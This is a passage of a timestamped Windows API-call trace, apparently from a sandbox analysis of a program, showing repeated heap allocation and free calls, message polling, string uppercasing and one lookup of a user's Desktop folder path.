lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0145.423] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0145.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0010 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0145.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0145.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff98 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0145.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0740 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0768 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0145.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff20 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff48 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0145.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0790 [0145.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0145.426] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bb8 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1718 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c60 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1718 | out: hHeap=0x25c0000) returned 1 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1718 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.426] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1718 | out: hHeap=0x25c0000) returned 1 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c60 | out: hHeap=0x25c0000) returned 1 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bb8 | out: hHeap=0x25c0000) returned 1 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0145.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0145.426] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bb8 [0145.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0145.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bb8 | out: hHeap=0x25c0000) returned 1 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bb8 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b07b8 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c60 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1718 [0145.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c60 | out: hHeap=0x25c0000) returned 1 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b07e0 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c60 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cf0 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1918 [0145.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bb8 | out: hHeap=0x25c0000) returned 1 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0808 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1928 [0145.427] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0808 | out: hHeap=0x25c0000) returned 1 [0145.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1928 | out: hHeap=0x25c0000) returned 1 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bb8 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1928 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d08 [0145.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa290 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0145.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2a8 [0145.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa2c0 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0808 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2d8 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0145.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa2d8 | out: hHeap=0x25c0000) returned 1 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0830 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2d8 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2f0 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0145.428] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa308 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0145.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa308 | out: hHeap=0x25c0000) returned 1 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0858 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa308 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa320 [0145.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1958 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0880 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa338 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1968 [0145.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa338 | out: hHeap=0x25c0000) returned 1 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b08a8 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa338 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa350 [0145.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0858 | out: hHeap=0x25c0000) returned 1 [0145.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0145.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa308 | out: hHeap=0x25c0000) returned 1 [0145.429] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0858 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa308 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa368 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1978 [0145.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1978 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa380 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa398 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1988 [0145.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa380 | out: hHeap=0x25c0000) returned 1 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1978 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0145.430] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1978 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa380 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa398 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1988 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1998 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3e0 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3f8 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa410 [0145.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa428 [0145.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa440 [0145.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa458 [0145.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b19a8 [0145.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa470 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3f8 | out: hHeap=0x25c0000) returned 1 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa428 | out: hHeap=0x25c0000) returned 1 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa440 | out: hHeap=0x25c0000) returned 1 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.431] lstrlenW (lpString="20") returned 2 [0145.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa470 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3c8 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1988 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa380 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3c8 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.432] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.432] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1988 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1978 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa380 [0145.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa398 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa470 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa458 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1998 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3e0 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa440 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1998 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa428 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1998 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3f8 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1998 [0145.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa410 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa440 | out: hHeap=0x25c0000) returned 1 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa428 | out: hHeap=0x25c0000) returned 1 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa470 | out: hHeap=0x25c0000) returned 1 [0145.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.433] lstrlenW (lpString="30") returned 2 [0145.434] HeapFree (in: hHeap=0x25c0000, 